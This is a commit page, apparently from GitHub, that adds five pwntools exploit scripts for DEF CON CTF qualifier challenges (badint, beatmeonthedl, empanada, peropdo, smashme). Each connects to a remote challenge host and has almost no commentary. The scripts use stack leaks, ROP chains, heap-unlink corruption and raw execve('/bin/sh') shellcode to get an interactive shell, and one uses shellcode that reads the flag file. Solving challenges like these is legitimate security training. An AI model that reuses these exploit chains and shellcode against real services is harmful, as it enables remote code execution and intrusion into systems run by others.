Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
5 changed files
with
284 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,62 @@ | ||
| from pwn import * | ||
|
|
||
| context.log_level = "DEBUG" | ||
|
|
||
| #p = process('./badint') | ||
| p = remote('badint_7312a689cf32f397727635e8be495322.quals.shallweplayaga.me', 21813) | ||
|
|
||
| p.recv() | ||
|
|
||
| # stack leak | ||
| p.sendline('0') | ||
| p.recv() | ||
| p.sendline('0') | ||
| p.recv() | ||
| p.sendline('A'*512) | ||
| p.recvuntil(']') | ||
| stack = u64(p.recv(16).decode('hex')[::-1]) | ||
| print "stack:", hex(stack) | ||
| p.recvuntil('SEQ #') | ||
|
|
||
|
|
||
| # pivot rsp to a lot of stack data we control | ||
| p.sendline('0') # seq | ||
| p.recv() | ||
| p.sendline(str(256-0x20)) # offset | ||
| p.recv() | ||
|
|
||
| saved_bp = stack-32 | ||
| our_buf = stack+144+0x1d8-0x48 | ||
| pop_5x = 0x000000000040252d | ||
|
|
||
| print "saved bp:", hex(saved_bp) | ||
| print "our buf:", hex(our_buf) | ||
|
|
||
| pop_rdi = 0x0000000000402533 | ||
| pop_rsi_r15 = 0x0000000000402531 | ||
| call_rax = 0x0000000000400ccd | ||
| dlsym = 0x400B90 | ||
| # overwrite | ||
| # v-- dest - 0x8 # val | ||
| thing = p64(saved_bp - 8).encode('hex') + p64(our_buf).encode('hex') | ||
| thing += p64(0x604000).encode('hex') # ptr_to_n_elems | ||
| thing += '1' * (472-0x30-len(thing)) | ||
|
|
||
| ptr_to_system = our_buf + 8*10 | ||
| ptr_to_bin_sh = ptr_to_system + len("system\x00") | ||
| thing += p64(pop_rdi) + p64(0) | ||
| thing += p64(pop_rsi_r15) + p64(ptr_to_system) + p64(0) | ||
| thing += p64(dlsym) | ||
| thing += p64(pop_rdi) + p64(ptr_to_bin_sh) | ||
| thing += p64(call_rax) | ||
|
|
||
| thing += "system\x00" | ||
| thing += "/bin/sh\x00" | ||
|
|
||
| print len(thing) | ||
|
|
||
| p.sendline(thing) | ||
| p.recv() | ||
| p.sendline('Yes') # Last seg | ||
|
|
||
| p.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,78 @@ | ||
| from pwn import * | ||
|
|
||
| context.log_level = "DEBUG" | ||
|
|
||
| #p = process('./beatmeonthedl') | ||
| p = remote('beatmeonthedl_498e7cad3320af23962c78c7ebe47e16.quals.shallweplayaga.me', 6969) | ||
| pause() | ||
|
|
||
| p.recvuntil('username: ') | ||
| p.sendline('A'*16) | ||
| p.recvuntil('user: ') | ||
| p.recvuntil('A'*16) | ||
| l = p.recvuntil('\n')[:-1] | ||
| l += '\x00' * (8-len(l)) | ||
| stack_leak = u64(l) | ||
| print hex(stack_leak) | ||
|
|
||
| p.sendline('mcfly') | ||
| p.recvuntil('Pass: ') | ||
| p.sendline('awesnap') | ||
|
|
||
| p.recvuntil('| ') | ||
|
|
||
| def request(data): | ||
| p.sendline('1') | ||
| p.recvuntil('> ') | ||
| p.sendline(data) | ||
| p.recvuntil('| ') | ||
|
|
||
| def delete(idx): | ||
| p.sendline('3') | ||
| p.recvuntil('choice: ') | ||
| p.sendline(str(idx)) | ||
| p.recvuntil('| ') | ||
|
|
||
| def change(idx, data): | ||
| p.sendline('4') | ||
| p.recvuntil('choice: ') | ||
| p.sendline(str(idx)) | ||
| p.recvuntil('data: ') | ||
| p.sendline(data) | ||
| p.recvuntil('| ') | ||
|
|
||
|
|
||
| request('A'*0x38) | ||
| request('B'*0x38) | ||
| request('C'*0x38) | ||
| request('D'*0x38) | ||
| request('E'*0x38) | ||
|
|
||
| delete(3) | ||
|
|
||
| change(2, 'F'*0x38 + p64(0x609ab8)*3) | ||
|
|
||
| request('G'*4) | ||
|
|
||
| delete(2) | ||
|
|
||
| change(1, 'H'*0x38 + p64(0x609ac0)*3) | ||
|
|
||
| main_ret_addr = stack_leak + 40 | ||
|
|
||
| request(p64(main_ret_addr-0x18)) | ||
|
|
||
|
|
||
| request('a'*24) | ||
|
|
||
| change(0, p64(0x609b88-0x18)) | ||
|
|
||
| request('1'*4) | ||
|
|
||
| delete(1) | ||
|
|
||
| change(0, 'A'*0x3b + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05") | ||
|
|
||
| p.sendline('5') | ||
|
|
||
| p.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,82 @@ | ||
| from pwn import * | ||
|
|
||
| context.log_level = "DEBUG" | ||
|
|
||
| #p = process('./empanada') | ||
| p = remote('empanada_45e50f0410494ec9cfb90430d2e86287.quals.shallweplayaga.me', 47281) | ||
|
|
||
|
|
||
| def msg(t, size, idx): | ||
| return chr(t << 7 | idx << 5 | size) | ||
|
|
||
| def msg_cnt(idx=0, t=1): | ||
| return msg(t,1,idx) + chr(64) | ||
|
|
||
| def del_msg(msg_idx, idx=0, t=1): | ||
| return msg(t,2,idx) + chr(80) + chr(msg_idx) | ||
|
|
||
| def get_all(idx=0, t=1): | ||
| return msg(t,1,idx) + chr(96) | ||
|
|
||
| def get_msg(msg_idx, idx=0, t=1): | ||
| return msg(t,2,idx) + chr(48) + chr(msg_idx) | ||
|
|
||
| def get_hash(msg_idx, idx=0, t=1): | ||
| return msg(t,2,idx) + chr(32) + chr(msg_idx) | ||
|
|
||
| def store_msg(idx=1, t=1): | ||
| return msg(t,1,idx) + chr(16) | ||
|
|
||
| def del_all(idx=0, t=1): | ||
| return msg(t,1,idx) + chr(0) | ||
|
|
||
| def exit(idx=0, t=1): | ||
| return msg(t,1,idx) + chr(1) | ||
|
|
||
| def clr_invalid(idx=0, t=1): | ||
| return msg(t,1,idx) + chr(0xfe) | ||
|
|
||
| def data_msg(data, idx=0, t=1): | ||
| return msg(t, len(data), idx) + data | ||
|
|
||
| # setup what will become our own empmsg | ||
| shellcode_addr = 0x313371ef | ||
|
|
||
| p.sendline(store_msg() + data_msg('A'*9 + p32(shellcode_addr) + 'A'*3)) | ||
| print p.recv() | ||
| p.sendline(store_msg() + data_msg(' ' + p32(0x31337138) + 'B'*7)) | ||
| print p.recv() | ||
|
|
||
| # The two data messages with t=0 will get rellocated to get_all's msg itself | ||
| # and then to get_all's response buffer | ||
| p.sendline(store_msg() + data_msg('', t=0)) | ||
| print p.recv() | ||
| p.sendline(store_msg() + data_msg('', t=0)) | ||
| print p.recv() | ||
|
|
||
| p.sendline(clr_invalid()) | ||
| print p.recv() | ||
|
|
||
| p.sendline(get_all()) | ||
| print p.recv() | ||
|
|
||
| # read in to another shellcode buffer at 0x31338000 so we don't have to worry | ||
| # about length and jump to it | ||
| shellcode = "\xb8\x03\x00\x00\x00\xbb\x00\x00\x00\x00\xb9\x00\x8031\xba\xe8\x03\x00\x00\xcd\x80\xb8\x00\x8031\xff\xe0" | ||
|
|
||
| p.sendline(store_msg() + data_msg(shellcode)) | ||
| print p.recv() | ||
|
|
||
| # at this point, the last store should have a dangling next pointer. | ||
| # now try to get the hash which walks the linked list, hopefully calling | ||
| # something we control from the original messages | ||
|
|
||
| p.sendline(get_hash(3)) | ||
|
|
||
| # 2nd stage shellcode which opens "flag", reads, and writes to stdout | ||
| p.sendline("\xb8\x05\x00\x00\x00j\x00hflag\x89\xe3\xb9\x00\x00\x00\x00\xcd\x80\x89\xc3\xb8\x03\x00\x00\x00\xb9\x00\x9031\xbad\x00\x00\x00\xcd\x80\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\xb9\x00\x9031\xbad\x00\x00\x00\xcd\x80") | ||
|
|
||
| p.sendline('ls') | ||
| print p.recv() | ||
|
|
||
| p.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,48 @@ | ||
| from pwn import * | ||
|
|
||
| context.log_level = "DEBUG" | ||
|
|
||
| p = remote('peropdo_bb53b90b35dba86353af36d3c6862621.quals.shallweplayaga.me', 80) | ||
| #p = process('./peropdo') | ||
| pause() | ||
|
|
||
| seed = 0x048ab95a | ||
| name_addr = 0x80ecfed | ||
| pad = name_addr - 0x80ecfc4 | ||
| xor_eax = 0x08054b80 | ||
| inc_eax = 0x0807bf06 | ||
| pop_eax = 0x080e77a4 | ||
| pop_ebx = 0x08058e28 | ||
| pop_ecx = 0x080e5ee1 | ||
| pop_edx = 0x0806f2fa | ||
| interrupt = 0x08049551 | ||
|
|
||
| s = p32(seed) | ||
| for x in range(pad+4): | ||
| s += ("A") | ||
| s += p32(pop_ebx) + p32(0x80ed051) # -> /bin/sh | ||
| s += p32(pop_edx) + p32(0x80ed05c) # envp | ||
| s += p32(pop_eax) + p32(0x80ed040) # argv - 0x24 | ||
| s += p32(pop_ecx) + p32(0x80ed051) # -> /bin/sh | ||
| s += p32(0x08054322) # mov [eax + 0x24], ecx; ret | ||
| s += p32(pop_ecx) + p32(0x80ed064) # argv -> [*/bin/sh, 0] | ||
|
|
||
| s += p32(xor_eax) | ||
| for x in range(11): | ||
| s += p32(inc_eax) | ||
|
|
||
| s += p32(interrupt) | ||
| s += "/bin/sh" | ||
|
|
||
| assert '\x09' not in s | ||
| assert '\x0a' not in s | ||
| assert '\x0b' not in s | ||
| assert '\x00' not in s | ||
|
|
||
| p.recv() | ||
| p.sendline(s) | ||
| p.recvuntil('?\n') | ||
| p.sendline("23") | ||
| p.recv() | ||
| p.sendline("n") | ||
| p.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,14 @@ | ||
| from pwn import * | ||
|
|
||
| #p = process('./smashme') | ||
| p = remote('smashme_omgbabysfirst.quals.shallweplayaga.me', 57348) | ||
|
|
||
| pause() | ||
|
|
||
| magic = "Smash me outside, how bout dAAAAAAAAAAA" | ||
| push_rsp_ret = 0x000000000044611d | ||
| shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" | ||
|
|
||
| p.sendline(magic+'B'*33+p64(push_rsp_ret)+shellcode) | ||
|
|
||
| p.interactive() |